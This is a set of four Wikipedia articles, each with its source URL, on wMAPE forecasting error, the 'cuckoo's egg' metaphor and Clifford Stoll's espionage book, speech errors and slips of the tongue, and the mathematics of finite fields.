WMAPE(sometimes spelledwMAPE) stands for weighted mean absolute percentage error.[2]It is a measure used to evaluate the performance of regression or forecasting models. It is a variant of MAPE in which the mean absolute percent errors is treated as a weighted arithmetic mean. Most commonly the absolute percent errors are weighted by the actuals (e.g. in case of sales forecasting, errors are weighted by sales volume).[3]Effectively, this overcomes the 'infinite error' issue.[4]Its formula is:[4]wMAPE=∑i=1n(wi⋅|Ai−Fi||Ai|)∑i=1nwi=∑i=1n(|Ai|⋅|Ai−Fi||Ai|)∑i=1n|Ai|{\displaystyle {\mbox{wMAPE}}={\frac {\displaystyle \sum _{i=1}^{n}\left(w_{i}\cdot {\tfrac {\left|A_{i}-F_{i}\right|}{|A_{i}|}}\right)}{\displaystyle \sum _{i=1}^{n}w_{i}}}={\frac {\displaystyle \sum _{i=1}^{n}\left(|A_{i}|\cdot {\tfrac {\left|A_{i}-F_{i}\right|}{|A_{i}|}}\right)}{\displaystyle \sum _{i=1}^{n}\left|A_{i}\right|}}}
Wherewi{\displaystyle w_{i}}is the weight,A{\displaystyle A}is a vector of the actual data andF{\displaystyle F}is the forecast or prediction.
However, this effectively simplifies to a much simpler formula:wMAPE=∑i=1n|Ai−Fi|∑i=1n|Ai|{\displaystyle {\mbox{wMAPE}}={\frac {\displaystyle \sum _{i=1}^{n}\left|A_{i}-F_{i}\right|}{\displaystyle \sum _{i=1}^{n}\left|A_{i}\right|}}}
Confusingly, sometimes when people refer to wMAPE they are talking about a different model in which the numerator and denominator of the wMAPE formula above are weighted again by another set of custom weightswi{\displaystyle w_{i}}. Perhaps it would be more accurate to call this the double weighted MAPE (wwMAPE). Its formula is:wwMAPE=∑i=1nwi|Ai−Fi|∑i=1nwi|Ai|{\displaystyle {\mbox{wwMAPE}}={\frac {\displaystyle \sum _{i=1}^{n}w_{i}\left|A_{i}-F_{i}\right|}{\displaystyle \sum _{i=1}^{n}w_{i}\left|A_{i}\right|}}}
Although the concept of MAPE sounds very simple and convincing, it has major drawbacks in practical application,[5]and there are many studies on shortcomings and misleading results from MAPE.[6][7]
To overcome these issues with MAPE, there are some other measures proposed in literature:
|
https://en.wikipedia.org/wiki/Mean_absolute_percentage_error
|
Acuckoo's eggis ametaphorforbrood parasitism, where a parasitic bird deposits its egg into a host's nest, which then incubates and feeds the chick that hatches, even at the expense of its own offspring. That original biological meaning has been extended to other uses, including one which referencesspywareand other pieces ofmalware.
The concept has been in use in the study ofbrood parasitismin birds since the 19th century. It first evolved ametaphoricmeaning of "misplaced trust",[1]wherein the chick hatched of acuckoo's egg, having been surreptitiously laid among the eggs of another bird of a different, smaller species, and thereupon incubated by the unwitting host parents, will consume any food brought by them to feed their own chicks, which then starve and eventually die.
The first well known application totradecraftwas in the 1989 bookThe Cuckoo's Egg: Tracking a Spy Through the Maze of Computer EspionagebyClifford Stoll,[2]in which Stoll deployed ahoneypotto catch a cyberhackerthat had accessed the secure computer system of the classified U.S. governmentLawrence Berkeley National Laboratory.[3]
Stoll chronicles the so-called 'Cuckoo's Egg Investigation', "a term coined by American press to describe (at the time) the farthest reaching computer-mediated espionage penetration by foreign agents”, which was also known as Operation Equalizer initiated and executed by theKGBthrough a small cadre of German hackers.[4]
In his book Stoll describes the hacker employing aTrojan horsestrategy to penetrate the secure Livermore Laboratory computer system:
I watched the cuckoo lay its egg: once again, he manipulated the files in my computer to make himself super-user. His same old trick: use the Gnu-Emacs move-mail to substitute his tainted program for the system's atrun file. Five minutes later, shazam! He was system manager.[5]
|
https://en.wikipedia.org/wiki/Cuckoo%27s_egg_(metaphor)
|
Aspeech error, commonly referred to as aslip of the tongue[1](Latin:lapsus linguae, or occasionally self-demonstratingly,lipsus languae) ormisspeaking, is adeviation(conscious or unconscious) from the apparently intended form of anutterance.[2]They can be subdivided into spontaneously and inadvertently producedspeecherrors and intentionally produced word-plays or puns. Another distinction can be drawn between production and comprehension errors. Errors in speech production and perception are also called performance errors.[3]Some examples of speech error include sound exchange or sound anticipation errors. In sound exchange errors, the order of two individual morphemes is reversed, while in sound anticipation errors a sound from a later syllable replaces one from an earlier syllable.[4]Slips of the tongue are a normal and common occurrence. One study shows that most people can make up to as much as 22 slips of the tongue per day.[5]
Speech errors are common amongchildren, who have yet to refine their speech, and can frequently continue into adulthood. When errors continue past the age of 9 they are referred to as "residual speech errors" or RSEs.[6]They sometimes lead to embarrassment and betrayal of the speaker'sregionalorethnicorigins. However, it is also common for them to enter thepopular cultureas a kind of linguistic "flavoring". Speech errors may be used intentionally for humorous effect, as withspoonerisms.
Within the field ofpsycholinguistics, speech errors fall under the category oflanguage production. Types of speech errors include: exchange errors, perseveration, anticipation, shift, substitution, blends, additions, and deletions. The study of speech errors has contributed to the establishment/refinement of models of speech production sinceVictoria Fromkin's pioneering work on this topic.[7]
Speech errors are made on an occasional basis by all speakers.[1]They occur more often when speakers are nervous, tired, anxious or intoxicated.[1]During live broadcasts on TV or on the radio, for example, nonprofessional speakers and even hosts often make speech errors because they are under stress.[1]Some speakers seem to be more prone to speech errors than others. For example, there is a certain connection between stuttering and speech errors.[8]Charles F. Hockett explains that "whenever a speaker feels some anxiety about possible lapse, he will be led to focus attention more than normally on what he has just said and on what he is just about to say. These are ideal breeding grounds for stuttering."[8]Another example of a "chronic sufferer" is ReverendWilliam Archibald Spooner, whose peculiar speech may be caused by a cerebral dysfunction, but there is much evidence that he invented his famous speech errors (spoonerisms).[1]
An explanation for the occurrence of speech errors comes frompsychoanalysis, in the so-calledFreudian slip. Sigmund Freud assumed that speech errors are the result of an intrapsychic conflict of concurrent intentions.[1]"Virtually all speech errors [are] caused by the intrusion of repressed ideas from the unconscious into one's conscious speech output", Freud explained.[1]In fact, his hypothesis explains only a minority of speech errors.[1]
There are few speech errors that clearly fall into only one category. The majority of speech errors can be interpreted in different ways and thus fall into more than one category.[9]For this reason, percentage figures for the different kinds of speech errors may be of limited accuracy.[10]Moreover, the study of speech errors gave rise to different terminologies and different ways of classifying speech errors. Here is a collection of the main types:
Error:The box is wed.
Speech errors can affect different kinds of segments or linguistic units:
Speech production is a highly complex and extremely rapid process, and thus research into the involved mental mechanisms proves to be difficult.[10]Investigating the audible output of the speech production system is a way to understand these mental mechanisms. According to Gary S. Dell "the inner workings of a highly complex system are often revealed by the way in which the system breaks down".[10]Therefore, speech errors are of an explanatory value with regard to the nature of language and language production.[12]
Performance errors may provide the linguist with empirical evidence for linguistic theories and serve to test hypotheses about language and speech production models.[13]For that reason, the study of speech errors is significant for the construction of performance models and gives insight into language mechanisms.[13]
An example of the information that can be obtained is the use of "um" or "uh" in a conversation.[15]These might be meaningful words that tell different things, one of which is to hold a place in the conversation so as not to be interrupted. There seems to be a hesitant stage and fluent stage that suggest speech has different levels of production. The pauses seem to occur between sentences, conjunctional points and before the first content word in a sentence. That suggests that a large part of speech production happens there.
Schachter et al. (1991) conducted an experiment to examine if the numbers of word choices affect pausing. They sat in on the lectures of 47 undergraduate professors from 10 different departments and calculated the number and times of filled pauses and unfilled pauses. They found significantly more pauses in the humanities departments as opposed to the natural sciences.[16]These findings suggest that the greater the number of word choices, the more frequent are the pauses, and hence the pauses serve to allow us time to choose our words.
Slips of the tongue are another form of "errors" that can help us understand the process of speech production better. Slips can occur at various levels: syntactic, phrasal, lexical-semantic, morphological, and phonological. They can take multiple forms, such as additions, substitutions, deletions, exchanges, anticipations, perseverations, shifts, and haplologies M.F. Garrett, (1975).[17]Slips are orderly because language production is orderly.
There are some biases shown through slips of the tongue. One kind is a lexical bias which shows that the slips people generate are more often actual words than random sound strings. Baars Motley and Mackay (1975) found that it was more common for people to turn two actual words to two other actual words than when they do not create real words.[14]This suggests that lexemes might overlap somewhat or be stored similarly.
A second kind is a semantic bias which shows a tendency for sound bias to create words that are semantically related to other words in the linguistic environment. Motley and Baars (1976) found that a word pair like "get one" will more likely slip to "wet gun" if the pair before it is "damp rifle". These results suggest that we are sensitive to how things are laid out semantically.[18]
Since the 1980s, the wordmisspeakinghas been used increasingly in politics to imply that errors made by a speaker are accidental and should not be construed as a deliberate attempt to misrepresent the facts of a case. As such, its usage has attracted a degree of media coverage, particularly from critics who feel that the term is overlyapprobativein cases where either ignorance of the facts or intent to misrepresent should not be discarded as possibilities.[19][20]
The word was used by a White House spokesman afterGeorge W. Bushseemed to say that his government was always "thinking about new ways to harm our country and our people" (a classic example of aBushism), and more famously by then American presidential candidateHillary Clintonwho recalled landing in at the US military outpost ofTuzla"under sniper fire" (in fact, video footage demonstrates that there were no such problems on her arrival).[20][21]Other users of the term include American politicianRichard Blumenthal, who incorrectly stated on a number of occasions that he had served in Vietnam during theVietnam War.[20]
|
https://en.wikipedia.org/wiki/Speech_error
|
Inmathematics, afinite fieldorGalois field(so-named in honor ofÉvariste Galois) is afieldthat contains a finite number ofelements. As with any field, a finite field is aseton which the operations of multiplication, addition, subtraction and division are defined and satisfy certain basic rules. The most common examples of finite fields are theintegers modp{\displaystyle p}whenp{\displaystyle p}is aprime number.
Theorderof a finite field is its number of elements, which is either a prime number or aprime power. For every prime numberp{\displaystyle p}and every positive integerk{\displaystyle k}there are fields of orderpk{\displaystyle p^{k}}. All finite fields of a given order areisomorphic.
Finite fields are fundamental in a number of areas of mathematics andcomputer science, includingnumber theory,algebraic geometry,Galois theory,finite geometry,cryptographyandcoding theory.
A finite field is a finite set that is afield; this means that multiplication, addition, subtraction and division (excluding division by zero) are defined and satisfy the rules of arithmetic known as thefield axioms.[1]
The number of elements of a finite field is called itsorderor, sometimes, itssize. A finite field of orderq{\displaystyle q}exists if and only ifq{\displaystyle q}is aprime powerpk{\displaystyle p^{k}}(wherep{\displaystyle p}is a prime number andk{\displaystyle k}is a positive integer). In a field of orderpk{\displaystyle p^{k}}, addingp{\displaystyle p}copies of any element always results in zero; that is, thecharacteristicof the field isp{\displaystyle p}.[1]
Forq=pk{\displaystyle q=p^{k}}, all fields of orderq{\displaystyle q}areisomorphic(see§ Existence and uniquenessbelow).[2]Moreover, a field cannot contain two different finitesubfieldswith the same order. One may therefore identify all finite fields with the same order, and they are unambiguously denotedFq{\displaystyle \mathbb {F} _{q}},Fq{\displaystyle \mathbf {F} _{q}}orGF(q){\displaystyle \mathrm {GF} (q)}, where the letters GF stand for "Galois field".[3]
In a finite field of orderq{\displaystyle q}, thepolynomialXq−X{\displaystyle X^{q}-X}has allq{\displaystyle q}elements of the finite field asroots.[citation needed]The non-zero elements of a finite field form amultiplicative group. This group iscyclic, so all non-zero elements can be expressed as powers of a single element called aprimitive elementof the field. (In general there will be several primitive elements for a given field.)[1]
The simplest examples of finite fields are the fields of prime order: for eachprime numberp{\displaystyle p}, theprime fieldof orderp{\displaystyle p}may be constructed as theintegers modulop{\displaystyle p},Z/pZ{\displaystyle \mathbb {Z} /p\mathbb {Z} }.[1]
The elements of the prime field of orderp{\displaystyle p}may be represented by integers in the range0,…,p−1{\displaystyle 0,\ldots ,p-1}. The sum, the difference and the product are theremainder of the divisionbyp{\displaystyle p}of the result of the corresponding integer operation.[1]The multiplicative inverse of an element may be computed by using the extended Euclidean algorithm (seeExtended Euclidean algorithm § Modular integers).[citation needed]
LetF{\displaystyle F}be a finite field. For any elementx{\displaystyle x}inF{\displaystyle F}and anyintegern{\displaystyle n}, denote byn⋅x{\displaystyle n\cdot x}the sum ofn{\displaystyle n}copies ofx{\displaystyle x}. The least positiven{\displaystyle n}such thatn⋅1=0{\displaystyle n\cdot 1=0}is the characteristicp{\displaystyle p}of the field.[1]This allows defining a multiplication(k,x)↦k⋅x{\displaystyle (k,x)\mapsto k\cdot x}of an elementk{\displaystyle k}ofGF(p){\displaystyle \mathrm {GF} (p)}by an elementx{\displaystyle x}ofF{\displaystyle F}by choosing an integer representative fork{\displaystyle k}. This multiplication makesF{\displaystyle F}into aGF(p){\displaystyle \mathrm {GF} (p)}-vector space.[1]It follows that the number of elements ofF{\displaystyle F}ispn{\displaystyle p^{n}}for some integern{\displaystyle n}.[1]
Theidentity(x+y)p=xp+yp{\displaystyle (x+y)^{p}=x^{p}+y^{p}}(sometimes called thefreshman's dream) is true in a field of characteristicp{\displaystyle p}. This follows from thebinomial theorem, as eachbinomial coefficientof the expansion of(x+y)p{\displaystyle (x+y)^{p}}, except the first and the last, is a multiple ofp{\displaystyle p}.[citation needed]
ByFermat's little theorem, ifp{\displaystyle p}is a prime number andx{\displaystyle x}is in the fieldGF(p){\displaystyle \mathrm {GF} (p)}thenxp=x{\displaystyle x^{p}=x}. This implies the equalityXp−X=∏a∈GF(p)(X−a){\displaystyle X^{p}-X=\prod _{a\in \mathrm {GF} (p)}(X-a)}for polynomials overGF(p){\displaystyle \mathrm {GF} (p)}. More generally, every element inGF(pn){\displaystyle \mathrm {GF} (p^{n})}satisfies the polynomial equationxpn−x=0{\displaystyle x^{p^{n}}-x=0}.[citation needed]
Any finitefield extensionof a finite field isseparableand simple. That is, ifE{\displaystyle E}is a finite field andF{\displaystyle F}is a subfield ofE{\displaystyle E}, thenE{\displaystyle E}is obtained fromF{\displaystyle F}by adjoining a single element whoseminimal polynomialisseparable. To use a piece of jargon, finite fields areperfect.[1]
A more generalalgebraic structurethat satisfies all the other axioms of a field, but whose multiplication is not required to becommutative, is called adivision ring(or sometimesskew field). ByWedderburn's little theorem, any finite division ring is commutative, and hence is a finite field.[1]
Letq=pn{\displaystyle q=p^{n}}be aprime power, andF{\displaystyle F}be thesplitting fieldof the polynomialP=Xq−X{\displaystyle P=X^{q}-X}over the prime fieldGF(p){\displaystyle \mathrm {GF} (p)}. This means thatF{\displaystyle F}is a finite field of lowest order, in whichP{\displaystyle P}hasq{\displaystyle q}distinct roots (theformal derivativeofP{\displaystyle P}isP′=−1{\displaystyle P'=-1}, implying thatgcd(P,P′)=1{\displaystyle \mathrm {gcd} (P,P')=1}, which in general implies that the splitting field is aseparable extensionof the original). Theabove identityshows that the sum and the product of two roots ofP{\displaystyle P}are roots ofP{\displaystyle P}, as well as the multiplicative inverse of a root ofP{\displaystyle P}. In other words, the roots ofP{\displaystyle P}form a field of orderq{\displaystyle q}, which is equal toF{\displaystyle F}by the minimality of the splitting field.
The uniqueness up to isomorphism of splitting fields implies thus that all fields of orderq{\displaystyle q}are isomorphic. Also, if a fieldF{\displaystyle F}has a field of orderq=pk{\displaystyle q=p^{k}}as a subfield, its elements are theq{\displaystyle q}roots ofXq−X{\displaystyle X^{q}-X}, andF{\displaystyle F}cannot contain another subfield of orderq{\displaystyle q}.
In summary, we have the following classification theorem first proved in 1893 byE. H. Moore:[2]
The order of a finite field is a prime power. For every prime powerq{\displaystyle q}there are fields of orderq{\displaystyle q}, and they are all isomorphic. In these fields, every element satisfiesxq=x,{\displaystyle x^{q}=x,}and the polynomialXq−X{\displaystyle X^{q}-X}factors asXq−X=∏a∈F(X−a).{\displaystyle X^{q}-X=\prod _{a\in F}(X-a).}
It follows thatGF(pn){\displaystyle \mathrm {GF} (p^{n})}contains a subfield isomorphic toGF(pm){\displaystyle \mathrm {GF} (p^{m})}if and only ifm{\displaystyle m}is a divisor ofn{\displaystyle n}; in that case, this subfield is unique. In fact, the polynomialXpm−X{\displaystyle X^{p^{m}}-X}dividesXpn−X{\displaystyle X^{p^{n}}-X}if and only ifm{\displaystyle m}is a divisor ofn{\displaystyle n}.
Given a prime powerq=pn{\displaystyle q=p^{n}}withp{\displaystyle p}prime andn>1{\displaystyle n>1}, the fieldGF(q){\displaystyle \mathrm {GF} (q)}may be explicitly constructed in the following way. One first chooses anirreducible polynomialP{\displaystyle P}inGF(p)[X]{\displaystyle \mathrm {GF} (p)[X]}of degreen{\displaystyle n}(such an irreducible polynomial always exists). Then thequotient ringGF(q)=GF(p)[X]/(P){\displaystyle \mathrm {GF} (q)=\mathrm {GF} (p)[X]/(P)}of the polynomial ringGF(p)[X]{\displaystyle \mathrm {GF} (p)[X]}by the ideal generated byP{\displaystyle P}is a field of orderq{\displaystyle q}.
More explicitly, the elements ofGF(q){\displaystyle \mathrm {GF} (q)}are the polynomials overGF(p){\displaystyle \mathrm {GF} (p)}whose degree is strictly less thann{\displaystyle n}. The addition and the subtraction are those of polynomials overGF(p){\displaystyle \mathrm {GF} (p)}. The product of two elements is the remainder of theEuclidean divisionbyP{\displaystyle P}of the product inGF(q)[X]{\displaystyle \mathrm {GF} (q)[X]}.
The multiplicative inverse of a non-zero element may be computed with the extended Euclidean algorithm; seeExtended Euclidean algorithm § Simple algebraic field extensions.
However, with this representation, elements ofGF(q){\displaystyle \mathrm {GF} (q)}may be difficult to distinguish from the corresponding polynomials. Therefore, it is common to give a name, commonlyα{\displaystyle \alpha }to the element ofGF(q){\displaystyle \mathrm {GF} (q)}that corresponds to the polynomialX{\displaystyle X}. So, the elements ofGF(q){\displaystyle \mathrm {GF} (q)}become polynomials inα{\displaystyle \alpha }, whereP(α)=0{\displaystyle P(\alpha )=0}, and, when one encounters a polynomial inα{\displaystyle \alpha }of degree greater or equal ton{\displaystyle n}(for example after a multiplication), one knows that one has to use the relationP(α)=0{\displaystyle P(\alpha )=0}to reduce its degree (it is what Euclidean division is doing).
Except in the construction ofGF(4){\displaystyle \mathrm {GF} (4)}, there are several possible choices forP{\displaystyle P}, which produce isomorphic results. To simplify the Euclidean division, one commonly chooses forP{\displaystyle P}a polynomial of the formXn+aX+b,{\displaystyle X^{n}+aX+b,}which make the needed Euclidean divisions very efficient. However, for some fields, typically in characteristic2{\displaystyle 2}, irreducible polynomials of the formXn+aX+b{\displaystyle X^{n}+aX+b}may not exist. In characteristic2{\displaystyle 2}, if the polynomialXn+X+1{\displaystyle X^{n}+X+1}is reducible, it is recommended to chooseXn+Xk+1{\displaystyle X^{n}+X^{k}+1}with the lowest possiblek{\displaystyle k}that makes the polynomial irreducible. If all thesetrinomialsare reducible, one chooses "pentanomials"Xn+Xa+Xb+Xc+1{\displaystyle X^{n}+X^{a}+X^{b}+X^{c}+1}, as polynomials of degree greater than1{\displaystyle 1}, with an even number of terms, are never irreducible in characteristic2{\displaystyle 2}, having1{\displaystyle 1}as a root.[4]
A possible choice for such a polynomial is given byConway polynomials. They ensure a certain compatibility between the representation of a field and the representations of its subfields.
In the next sections, we will show how the general construction method outlined above works for small finite fields.
The smallest non-prime field is the field with four elements, which is commonly denotedGF(4){\displaystyle \mathrm {GF} (4)}orF4.{\displaystyle \mathbb {F} _{4}.}It consists of the four elements0,1,α,1+α{\displaystyle 0,1,\alpha ,1+\alpha }such thatα2=1+α{\displaystyle \alpha ^{2}=1+\alpha },1⋅α=α⋅1=α{\displaystyle 1\cdot \alpha =\alpha \cdot 1=\alpha },x+x=0{\displaystyle x+x=0}, andx⋅0=0⋅x=0{\displaystyle x\cdot 0=0\cdot x=0}, for everyx∈GF(4){\displaystyle x\in \mathrm {GF} (4)}, the other operation results being easily deduced from thedistributive law. See below for the complete operation tables.
This may be deduced as follows from the results of the preceding section.
OverGF(2){\displaystyle \mathrm {GF} (2)}, there is only oneirreducible polynomialof degree2{\displaystyle 2}:X2+X+1{\displaystyle X^{2}+X+1}Therefore, forGF(4){\displaystyle \mathrm {GF} (4)}the construction of the preceding section must involve this polynomial, andGF(4)=GF(2)[X]/(X2+X+1).{\displaystyle \mathrm {GF} (4)=\mathrm {GF} (2)[X]/(X^{2}+X+1).}Letα{\displaystyle \alpha }denote a root of this polynomial inGF(4){\displaystyle \mathrm {GF} (4)}. This implies thatα2=1+α,{\displaystyle \alpha ^{2}=1+\alpha ,}and thatα{\displaystyle \alpha }and1+α{\displaystyle 1+\alpha }are the elements ofGF(4){\displaystyle \mathrm {GF} (4)}that are not inGF(2){\displaystyle \mathrm {GF} (2)}. The tables of the operations inGF(4){\displaystyle \mathrm {GF} (4)}result from this, and are as follows:
A table for subtraction is not given, because subtraction is identical to addition, as is the case for every field of characteristic 2.
In the third table, for the division ofx{\displaystyle x}byy{\displaystyle y}, the values ofx{\displaystyle x}must be read in the left column, and the values ofy{\displaystyle y}in the top row. (Because0⋅z=0{\displaystyle 0\cdot z=0}for everyz{\displaystyle z}in everyringthedivision by 0has to remain undefined.) From the tables, it can be seen that the additive structure ofGF(4){\displaystyle \mathrm {GF} (4)}is isomorphic to theKlein four-group, while the non-zero multiplicative structure is isomorphic to the groupZ3{\displaystyle Z_{3}}.
The mapφ:x↦x2{\displaystyle \varphi :x\mapsto x^{2}}is the non-trivial field automorphism, called theFrobenius automorphism, which sendsα{\displaystyle \alpha }into the second root1+α{\displaystyle 1+\alpha }of the above-mentioned irreducible polynomialX2+X+1{\displaystyle X^{2}+X+1}.
For applying theabove general constructionof finite fields in the case ofGF(p2){\displaystyle \mathrm {GF} (p^{2})}, one has to find an irreducible polynomial of degree 2. Forp=2{\displaystyle p=2}, this has been done in the preceding section. Ifp{\displaystyle p}is an odd prime, there are always irreducible polynomials of the formX2−r{\displaystyle X^{2}-r}, withr{\displaystyle r}inGF(p){\displaystyle \mathrm {GF} (p)}.
More precisely, the polynomialX2−r{\displaystyle X^{2}-r}is irreducible overGF(p){\displaystyle \mathrm {GF} (p)}if and only ifr{\displaystyle r}is aquadratic non-residuemodulop{\displaystyle p}(this is almost the definition of a quadratic non-residue). There arep−12{\displaystyle {\frac {p-1}{2}}}quadratic non-residues modulop{\displaystyle p}. For example,2{\displaystyle 2}is a quadratic non-residue forp=3,5,11,13,…{\displaystyle p=3,5,11,13,\ldots }, and3{\displaystyle 3}is a quadratic non-residue forp=5,7,17,…{\displaystyle p=5,7,17,\ldots }. Ifp≡3mod4{\displaystyle p\equiv 3\mod 4}, that isp=3,7,11,19,…{\displaystyle p=3,7,11,19,\ldots }, one may choose−1≡p−1{\displaystyle -1\equiv p-1}as a quadratic non-residue, which allows us to have a very simple irreducible polynomialX2+1{\displaystyle X^{2}+1}.
Having chosen a quadratic non-residuer{\displaystyle r}, letα{\displaystyle \alpha }be a symbolic square root ofr{\displaystyle r}, that is, a symbol that has the propertyα2=r{\displaystyle \alpha ^{2}=r}, in the same way that the complex numberi{\displaystyle i}is a symbolic square root of−1{\displaystyle -1}. Then, the elements ofGF(p2){\displaystyle \mathrm {GF} (p^{2})}are all the linear expressionsa+bα,{\displaystyle a+b\alpha ,}witha{\displaystyle a}andb{\displaystyle b}inGF(p){\displaystyle \mathrm {GF} (p)}. The operations onGF(p2){\displaystyle \mathrm {GF} (p^{2})}are defined as follows (the operations between elements ofGF(p){\displaystyle \mathrm {GF} (p)}represented by Latin letters are the operations inGF(p){\displaystyle \mathrm {GF} (p)}):−(a+bα)=−a+(−b)α(a+bα)+(c+dα)=(a+c)+(b+d)α(a+bα)(c+dα)=(ac+rbd)+(ad+bc)α(a+bα)−1=a(a2−rb2)−1+(−b)(a2−rb2)−1α{\displaystyle {\begin{aligned}-(a+b\alpha )&=-a+(-b)\alpha \\(a+b\alpha )+(c+d\alpha )&=(a+c)+(b+d)\alpha \\(a+b\alpha )(c+d\alpha )&=(ac+rbd)+(ad+bc)\alpha \\(a+b\alpha )^{-1}&=a(a^{2}-rb^{2})^{-1}+(-b)(a^{2}-rb^{2})^{-1}\alpha \end{aligned}}}
The polynomialX3−X−1{\displaystyle X^{3}-X-1}is irreducible overGF(2){\displaystyle \mathrm {GF} (2)}andGF(3){\displaystyle \mathrm {GF} (3)}, that is, it is irreduciblemodulo2{\displaystyle 2}and3{\displaystyle 3}(to show this, it suffices to show that it has no root inGF(2){\displaystyle \mathrm {GF} (2)}nor inGF(3){\displaystyle \mathrm {GF} (3)}). It follows that the elements ofGF(8){\displaystyle \mathrm {GF} (8)}andGF(27){\displaystyle \mathrm {GF} (27)}may be represented byexpressionsa+bα+cα2,{\displaystyle a+b\alpha +c\alpha ^{2},}wherea,b,c{\displaystyle a,b,c}are elements ofGF(2){\displaystyle \mathrm {GF} (2)}orGF(3){\displaystyle \mathrm {GF} (3)}(respectively), andα{\displaystyle \alpha }is a symbol such thatα3=α+1.{\displaystyle \alpha ^{3}=\alpha +1.}
The addition, additive inverse and multiplication onGF(8){\displaystyle \mathrm {GF} (8)}andGF(27){\displaystyle \mathrm {GF} (27)}may thus be defined as follows; in following formulas, the operations between elements ofGF(2){\displaystyle \mathrm {GF} (2)}orGF(3){\displaystyle \mathrm {GF} (3)}, represented by Latin letters, are the operations inGF(2){\displaystyle \mathrm {GF} (2)}orGF(3){\displaystyle \mathrm {GF} (3)}, respectively:−(a+bα+cα2)=−a+(−b)α+(−c)α2(forGF(8),this operation is the identity)(a+bα+cα2)+(d+eα+fα2)=(a+d)+(b+e)α+(c+f)α2(a+bα+cα2)(d+eα+fα2)=(ad+bf+ce)+(ae+bd+bf+ce+cf)α+(af+be+cd+cf)α2{\displaystyle {\begin{aligned}-(a+b\alpha +c\alpha ^{2})&=-a+(-b)\alpha +(-c)\alpha ^{2}\qquad {\text{(for }}\mathrm {GF} (8),{\text{this operation is the identity)}}\\(a+b\alpha +c\alpha ^{2})+(d+e\alpha +f\alpha ^{2})&=(a+d)+(b+e)\alpha +(c+f)\alpha ^{2}\\(a+b\alpha +c\alpha ^{2})(d+e\alpha +f\alpha ^{2})&=(ad+bf+ce)+(ae+bd+bf+ce+cf)\alpha +(af+be+cd+cf)\alpha ^{2}\end{aligned}}}
The polynomialX4+X+1{\displaystyle X^{4}+X+1}is irreducible overGF(2){\displaystyle \mathrm {GF} (2)}, that is, it is irreducible modulo2{\displaystyle 2}. It follows that the elements ofGF(16){\displaystyle \mathrm {GF} (16)}may be represented byexpressionsa+bα+cα2+dα3,{\displaystyle a+b\alpha +c\alpha ^{2}+d\alpha ^{3},}wherea,b,c,d{\displaystyle a,b,c,d}are either0{\displaystyle 0}or1{\displaystyle 1}(elements ofGF(2){\displaystyle \mathrm {GF} (2)}), andα{\displaystyle \alpha }is a symbol such thatα4=α+1{\displaystyle \alpha ^{4}=\alpha +1}(that is,α{\displaystyle \alpha }is defined as a root of the given irreducible polynomial). As the characteristic ofGF(2){\displaystyle \mathrm {GF} (2)}is2{\displaystyle 2}, each element is its additive inverse inGF(16){\displaystyle \mathrm {GF} (16)}. The addition and multiplication onGF(16){\displaystyle \mathrm {GF} (16)}may be defined as follows; in following formulas, the operations between elements ofGF(2){\displaystyle \mathrm {GF} (2)}, represented by Latin letters are the operations inGF(2){\displaystyle \mathrm {GF} (2)}.(a+bα+cα2+dα3)+(e+fα+gα2+hα3)=(a+e)+(b+f)α+(c+g)α2+(d+h)α3(a+bα+cα2+dα3)(e+fα+gα2+hα3)=(ae+bh+cg+df)+(af+be+bh+cg+df+ch+dg)α+(ag+bf+ce+ch+dg+dh)α2+(ah+bg+cf+de+dh)α3{\displaystyle {\begin{aligned}(a+b\alpha +c\alpha ^{2}+d\alpha ^{3})+(e+f\alpha +g\alpha ^{2}+h\alpha ^{3})&=(a+e)+(b+f)\alpha +(c+g)\alpha ^{2}+(d+h)\alpha ^{3}\\(a+b\alpha +c\alpha ^{2}+d\alpha ^{3})(e+f\alpha +g\alpha ^{2}+h\alpha ^{3})&=(ae+bh+cg+df)+(af+be+bh+cg+df+ch+dg)\alpha \;+\\&\quad \;(ag+bf+ce+ch+dg+dh)\alpha ^{2}+(ah+bg+cf+de+dh)\alpha ^{3}\end{aligned}}}
The fieldGF(16){\displaystyle \mathrm {GF} (16)}has eightprimitive elements(the elements that have all nonzero elements ofGF(16){\displaystyle \mathrm {GF} (16)}as integer powers). These elements are the four roots ofX4+X+1{\displaystyle X^{4}+X+1}and theirmultiplicative inverses. In particular,α{\displaystyle \alpha }is a primitive element, and the primitive elements areαm{\displaystyle \alpha ^{m}}withm{\displaystyle m}less than andcoprimewith15{\displaystyle 15}(that is, 1, 2, 4, 7, 8, 11, 13, 14).
The set of non-zero elements inGF(q){\displaystyle \mathrm {GF} (q)}is anabelian groupunder the multiplication, of orderq−1{\displaystyle q-1}. ByLagrange's theorem, there exists a divisork{\displaystyle k}ofq−1{\displaystyle q-1}such thatxk=1{\displaystyle x^{k}=1}for every non-zerox{\displaystyle x}inGF(q){\displaystyle \mathrm {GF} (q)}. As the equationxk=1{\displaystyle x^{k}=1}has at mostk{\displaystyle k}solutions in any field,q−1{\displaystyle q-1}is the lowest possible value fork{\displaystyle k}.
Thestructure theorem of finite abelian groupsimplies that this multiplicative group iscyclic, that is, all non-zero elements are powers of a single element. In summary:
Such an elementa{\displaystyle a}is called aprimitive elementofGF(q){\displaystyle \mathrm {GF} (q)}. Unlessq=2,3{\displaystyle q=2,3}, the primitive element is not unique. The number of primitive elements isϕ(q−1){\displaystyle \phi (q-1)}whereϕ{\displaystyle \phi }isEuler's totient function.
The result above implies thatxq=x{\displaystyle x^{q}=x}for everyx{\displaystyle x}inGF(q){\displaystyle \mathrm {GF} (q)}. The particular case whereq{\displaystyle q}is prime isFermat's little theorem.
Ifa{\displaystyle a}is a primitive element inGF(q){\displaystyle \mathrm {GF} (q)}, then for any non-zero elementx{\displaystyle x}inF{\displaystyle F}, there is a unique integern{\displaystyle n}with0≤n≤q−2{\displaystyle 0\leq n\leq q-2}such thatx=an{\displaystyle x=a^{n}}.
This integern{\displaystyle n}is called thediscrete logarithmofx{\displaystyle x}to the basea{\displaystyle a}.
Whilean{\displaystyle a^{n}}can be computed very quickly, for example usingexponentiation by squaring, there is no known efficient algorithm for computing the inverse operation, the discrete logarithm. This has been used in variouscryptographic protocols, seeDiscrete logarithmfor details.
